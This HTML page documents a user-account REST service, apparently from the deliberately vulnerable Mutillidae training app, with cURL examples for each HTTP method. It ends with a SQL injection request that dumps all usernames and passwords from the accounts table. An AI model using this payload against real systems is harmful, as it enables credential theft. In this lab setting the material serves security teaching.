<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>User Account Web Service Documentation</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            line-height: 1.6;
        }
        pre {
            background-color: #f4f4f4;
            padding: 10px;
            border-radius: 5px;
        }
        a {
            text-decoration: none;
            color: #2980b9;
            font-size: 1.2rem;
            font-weight: bold;
        }
        a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
<a href="rest-services.html">REST Services Home Page</a>
<div>
    <h2>Welcome to the User Account Web Service</h2>
    <p>This service allows you to <strong>create, read, update, and delete</strong> user accounts using various HTTP methods.</p>
    <p><strong>Note:</strong> This service is vulnerable to SQL injection at security level 0. Be cautious when testing or exploring its functionality.</p>
</div>
<hr>
<h3>Supported HTTP Methods</h3>
<h4>1. GET (Retrieve Data)</h4>
<p>Use GET requests to retrieve information about one or more accounts.</p>
<p><strong>Optional Parameter:</strong> <code>username</code> (as a URL parameter)</p>
<ul>
    <li>If <code>username=*</code>, all accounts will be returned.</li>
    <li>If <code>username</code> is specified, details for that user will be returned.</li>
</ul>
<strong>Examples:</strong><br>
<ul>
    <li>Retrieve a specific user:
        <pre>
GET /webservices/rest/ws-user-account.php?username=adrian HTTP/1.1
Host: mutillidae.localhost
Accept: application/json
        </pre>
        <strong>cURL Example:</strong>
        <pre>
curl -X GET "http://mutillidae.localhost/webservices/rest/ws-user-account.php?username=adrian" \
  -H "Accept: application/json"
        </pre>
    </li>
    <li>Retrieve all users:
        <pre>
GET /webservices/rest/ws-user-account.php?username=* HTTP/1.1
Host: mutillidae.localhost
Accept: application/json
        </pre>
        <strong>cURL Example:</strong>
        <pre>
curl -X GET "http://mutillidae.localhost/webservices/rest/ws-user-account.php?username=*" \
  -H "Accept: application/json"
        </pre>
    </li>
</ul>
<hr>
<h4>2. POST (Create New Account)</h4>
<p>Use POST requests to create a new user account.</p>
<p><strong>Required Parameters (POST body):</strong></p>
<ul>
    <li><code>username</code>: The username for the new account</li>
    <li><code>password</code>: The password for the new account</li>
    <li><code>firstname</code>: User's first name</li>
    <li><code>lastname</code>: User's last name</li>
</ul>
<p><strong>Optional Parameter:</strong> <code>signature</code> (User's signature)</p>
<strong>Example:</strong><br>
<pre>
POST /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=pass123&firstname=John&lastname=Doe&signature=JDoe
</pre>
<strong>cURL Example:</strong>
<pre>
curl -X POST "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=pass123&firstname=John&lastname=Doe&signature=JDoe"
</pre>
<hr>
<h4>3. PUT (Create or Update Account)</h4>
<p>Use PUT requests to <strong>create or update</strong> an existing user account.</p>
<p><strong>Required Parameters (POST body):</strong></p>
<ul>
    <li><code>username</code>: The username for the account</li>
    <li><code>password</code>: The password for the account</li>
    <li><code>firstname</code>: User's first name</li>
    <li><code>lastname</code>: User's last name</li>
</ul>
<p><strong>Optional Parameters:</strong></p>
<ul>
    <li><code>signature</code>: User's signature</li>
    <li><code>update_client_id</code> (boolean): If <code>true</code>, updates the client_id</li>
    <li><code>update_client_secret</code> (boolean): If <code>true</code>, updates the client_secret</li>
</ul>
<strong>Example:</strong><br>
<pre>
PUT /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=newpass123&firstname=John&lastname=Doe&signature=JDoeUpdated&update_client_id=true&update_client_secret=false
</pre>
<strong>cURL Example:</strong>
<pre>
curl -X PUT "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=newpass123&firstname=John&lastname=Doe&signature=JDoeUpdated&update_client_id=true&update_client_secret=false"
</pre>
<hr>
<h4>4. DELETE (Remove Account)</h4>
<p>Use DELETE requests to delete an existing user account.</p>
<p><strong>Required Parameters (POST body):</strong></p>
<ul>
    <li><code>username</code>: The username of the account to be deleted</li>
    <li><code>password</code>: The password for the account</li>
</ul>
<strong>Example:</strong><br>
<pre>
DELETE /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=newpass123
</pre>
<strong>cURL Example:</strong>
<pre>
curl -X DELETE "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=newpass123"
</pre>
<hr>
<h4>Example Exploits (SQL Injection)</h4>
<p>This service is vulnerable to SQL injection at security level 0. Example:</p>
<pre>
GET /webservices/rest/ws-user-account.php?username=jeremy'+union+select+concat('The+password+for+',username,'+is+',password),mysignature+from+accounts+-- HTTP/1.1
Host: mutillidae.localhost
</pre>
</body>
</html>
